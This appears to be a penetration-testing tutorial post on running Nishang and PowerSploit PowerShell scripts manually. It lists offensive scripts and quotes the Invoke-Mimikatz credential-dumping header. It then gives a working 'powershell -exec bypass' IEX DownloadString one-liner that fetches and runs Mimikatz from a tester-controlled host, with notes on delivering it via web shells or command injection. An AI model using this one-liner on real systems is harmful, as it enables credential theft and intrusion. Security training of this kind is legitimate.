Day 76: Use Nishang/Empire and Other Ps1 Scripts ‘Manually’.
Find Interesting Scripts
First, we want to figure out what we have after we have installed Nishang, Empire and other offensive Powershell Testing Frameworks, to do this just try the following:
locate *.ps1
You should have something like this excerpt taken from one of my lab VMs…
...
/usr/share/nishang/Backdoors/Add-RegBackdoor.ps1
/usr/share/nishang/Backdoors/Add-ScrnSaveBackdoor.ps1
/usr/share/nishang/Backdoors/DNS_TXT_Pwnage.ps1
/usr/share/nishang/Backdoors/Execute-OnTime.ps1
/usr/share/nishang/Backdoors/Gupt-Backdoor.ps1
/usr/share/nishang/Backdoors/HTTP-Backdoor.ps1
/usr/share/nishang/Backdoors/Invoke-ADSBackdoor.ps1
/usr/share/nishang/Backdoors/Set-RemotePSRemoting.ps1
/usr/share/nishang/Backdoors/Set-RemoteWMI.ps1
/usr/share/nishang/Bypass/Invoke-AmsiBypass.ps1
/usr/share/nishang/Client/Out-CHM.ps1
/usr/share/nishang/Client/Out-Excel.ps1
/usr/share/nishang/Client/Out-HTA.ps1
/usr/share/nishang/Client/Out-JS.ps1
/usr/share/nishang/Client/Out-Java.ps1
/usr/share/nishang/Client/Out-SCF.ps1
/usr/share/nishang/Client/Out-SCT.ps1
/usr/share/nishang/Client/Out-Shortcut.ps1
/usr/share/nishang/Client/Out-WebQuery.ps1
/usr/share/nishang/Client/Out-Word.ps1
/usr/share/nishang/Escalation/Enable-DuplicateToken.ps1
/usr/share/nishang/Escalation/Invoke-PsUACme.ps1
/usr/share/nishang/Escalation/Remove-Update.ps1
/usr/share/nishang/Execution/Download-Execute-PS.ps1
/usr/share/nishang/Execution/Download_Execute.ps1
/usr/share/nishang/Execution/Execute-Command-MSSQL.ps1
/usr/share/nishang/Execution/Execute-DNSTXT-Code.ps1
/usr/share/nishang/Execution/Out-RundllCommand.ps1
/usr/share/nishang/Gather/Check-VM.ps1
/usr/share/nishang/Gather/Copy-VSS.ps1
/usr/share/nishang/Gather/FireBuster.ps1
/usr/share/nishang/Gather/FireListener.ps1
/usr/share/nishang/Gather/Get-Information.ps1
/usr/share/nishang/Gather/Get-LSASecret.ps1
/usr/share/nishang/Gather/Get-PassHashes.ps1
/usr/share/nishang/Gather/Get-PassHints.ps1
/usr/share/nishang/Gather/Get-WLAN-Keys.ps1
/usr/share/nishang/Gather/Get-WebCredentials.ps1
/usr/share/nishang/Gather/Invoke-CredentialsPhish.ps1
/usr/share/nishang/Gather/Invoke-Mimikatz.ps1
/usr/share/nishang/Gather/Invoke-MimikatzWDigestDowngrade.ps1
/usr/share/nishang/Gather/Invoke-Mimikittenz.ps1
/usr/share/nishang/Gather/Invoke-SSIDExfil.ps1
/usr/share/nishang/Gather/Invoke-SessionGopher.ps1
/usr/share/nishang/Gather/Keylogger.ps1
/usr/share/nishang/Gather/Show-TargetScreen.ps1
/usr/share/nishang/MITM/Invoke-Interceptor.ps1
/usr/share/nishang/Misc/Speak.ps1
/usr/share/nishang/Pivot/Create-MultipleSessions.ps1
/usr/share/nishang/Pivot/Invoke-NetworkRelay.ps1
/usr/share/nishang/Pivot/Run-EXEonRemote.ps1
/usr/share/nishang/Prasadhak/Invoke-Prasadhak.ps1
/usr/share/nishang/Scan/Invoke-BruteForce.ps1
/usr/share/nishang/Scan/Invoke-PortScan.ps1
/usr/share/nishang/Shells/Invoke-JSRatRegsvr.ps1
/usr/share/nishang/Shells/Invoke-JSRatRundll.ps1
/usr/share/nishang/Shells/Invoke-PoshRatHttp.ps1
/usr/share/nishang/Shells/Invoke-PoshRatHttps.ps1
/usr/share/nishang/Shells/Invoke-PowerShellIcmp.ps1
/usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1
/usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1
/usr/share/nishang/Shells/Invoke-PowerShellTcpOneLineBind.ps1
/usr/share/nishang/Shells/Invoke-PowerShellUdp.ps1
/usr/share/nishang/Shells/Invoke-PowerShellUdpOneLine.ps1
/usr/share/nishang/Shells/Invoke-PowerShellWmi.ps1
/usr/share/nishang/Shells/Invoke-PsGcat.ps1
/usr/share/nishang/Shells/Invoke-PsGcatAgent.ps1
/usr/share/nishang/Shells/Remove-PoshRat.ps1
/usr/share/nishang/Utility/Add-Exfiltration.ps1
/usr/share/nishang/Utility/Add-Persistence.ps1
/usr/share/nishang/Utility/Base64ToString.ps1
/usr/share/nishang/Utility/ConvertTo-ROT13.ps1
/usr/share/nishang/Utility/Do-Exfiltration.ps1
/usr/share/nishang/Utility/Download.ps1
/usr/share/nishang/Utility/ExetoText.ps1
/usr/share/nishang/Utility/Invoke-Decode.ps1
/usr/share/nishang/Utility/Invoke-Encode.ps1
/usr/share/nishang/Utility/Out-DnsTxt.ps1
/usr/share/nishang/Utility/Parse_Keys.ps1
/usr/share/nishang/Utility/Remove-Persistence.ps1
/usr/share/nishang/Utility/Start-CaptureServer.ps1
/usr/share/nishang/Utility/StringToBase64.ps1
/usr/share/nishang/Utility/TexttoExe.ps1
/usr/share/powersploit/AntivirusBypass/Find-AVSignature.ps1
/usr/share/powersploit/CodeExecution/Invoke-DllInjection.ps1
/usr/share/powersploit/CodeExecution/Invoke-Shellcode.ps1
/usr/share/powersploit/CodeExecution/Invoke-ShellcodeMSIL.ps1
/usr/share/powersploit/CodeExecution/Watch-BlueScreen.ps1
/usr/share/powersploit/Exfiltration/Get-GPPPassword.ps1
/usr/share/powersploit/Exfiltration/Get-Keystrokes.ps1
/usr/share/powersploit/Exfiltration/Get-TimedScreenshot.ps1
/usr/share/powersploit/Exfiltration/Out-Minidump.ps1
/usr/share/powersploit/PETools/Get-DllLoadPath.ps1
/usr/share/powersploit/PETools/Get-ObjDump.ps1
/usr/share/powersploit/PETools/Get-PEHeader.ps1
/usr/share/powersploit/Persistence/Add-Persistence.ps1
/usr/share/powersploit/Persistence/New-UserPersistenceOptions.ps1
/usr/share/powersploit/Recon/Get-HttpStatus.ps1
/usr/share/powersploit/Recon/Invoke-Portscan.ps1
/usr/share/powersploit/Recon/Invoke-ReverseDnsLookup.ps1
/usr/share/powersploit/ReverseEngineering/ConvertTo-String.ps1
/usr/share/powersploit/ReverseEngineering/Get-ILDisassembly.ps1
/usr/share/powersploit/ReverseEngineering/Get-Member.ps1
/usr/share/powersploit/ReverseEngineering/Get-MethodAddress.ps1
/usr/share/powersploit/ReverseEngineering/Get-PEB.ps1
/usr/share/powersploit/ReverseEngineering/Get-Strings.ps1
/usr/share/powersploit/ReverseEngineering/Get-StructFromMemory.ps1
/usr/share/powersploit/ReverseEngineering/New-Object.ps1
/usr/share/powersploit/ScriptModification/Out-CompressedDll.ps1
/usr/share/powersploit/ScriptModification/Out-EncodedCommand.ps1
/usr/share/powersploit/ScriptModification/Out-EncryptedScript.ps1
/usr/share/powersploit/ScriptModification/Remove-Comments.ps1
...
Some of those things sound awesome right? Like Code Execution, Persistence, Pivot, Exfil and much more this is enough to get any offensive security tester wet around the lips. But what if we don’t want to use a full framework and we just want to run a single command? Try this to download and run at the same time.
Example with Mimikatz
Mimikatz we know well, but others not so much, in those cases it’s important we see what they do or it might get us noticed, kill our shell or worse, BSOD. So, we should be careful and check the code first.
less /usr/share/nishang/Gather/Invoke-Mimikatz.ps1
You will generally see something like this…
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script loads Mimikatz completely in memory..DESCRIPTIONThis script leverages Mimikatz 2.1.1 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers using PowerShell remoting.This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.Reflectively loads Mimikatz 2.1.1 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any
functionality provided with Mimikatz.The script, in near future, will provide additional commands for a variety of attacks possible with Mimikatz.Function: Invoke-Mimikatz
Author: Joe Bialek, Twitter: @JosephBialek
Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: benjamin@gentilkiwi.com. Twitter @gentilkiwi
License: http://creativecommons.org/licenses/by/3.0/fr/
Required Dependencies: Mimikatz (included)
Optional Dependencies: None
Mimikatz version: 2.1.1 (13/08/2017).PARAMETER DumpCredsSwitch: Use mimikatz to dump credentials out of LSASS..PARAMETER DumpCertsSwitch: Use mimikatz to export all private certificates (even if they are marked non-exportable).
The most important line is this…
function Invoke-Mimikatz
Always check this, some people are not consistent with naming conventions and you might have to use your head, but for those who don’t know the function name is what you need to call to invoke it.
The rest of the script gives you info etc and other examples of running the scripts.
For us, all we need to do to download this file and execute it is this one line…
Pentest Box
python -m SimpleHTTPServer 80
Windows Shell
powershell -exec bypass -command "IEX (New-Object System.Net.WebClient).DownloadString('http://$PENTEST_BOX_IP/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
In your windows terminal, you will see the output from the script, it really is that easy. Now spend some time looking at .ps1 scripts and seeing what you can do. Powershell is dying in some of the more secure corporate environments but for the rest, Powershell is still a titan of pwnage, a gift that keeps on giving.
Of course, some scripts need elevated privileges so I ran this in admin prompt to show one-liner in action. This can be delivered from anywhere, web shells, command injection, low privilege shells etc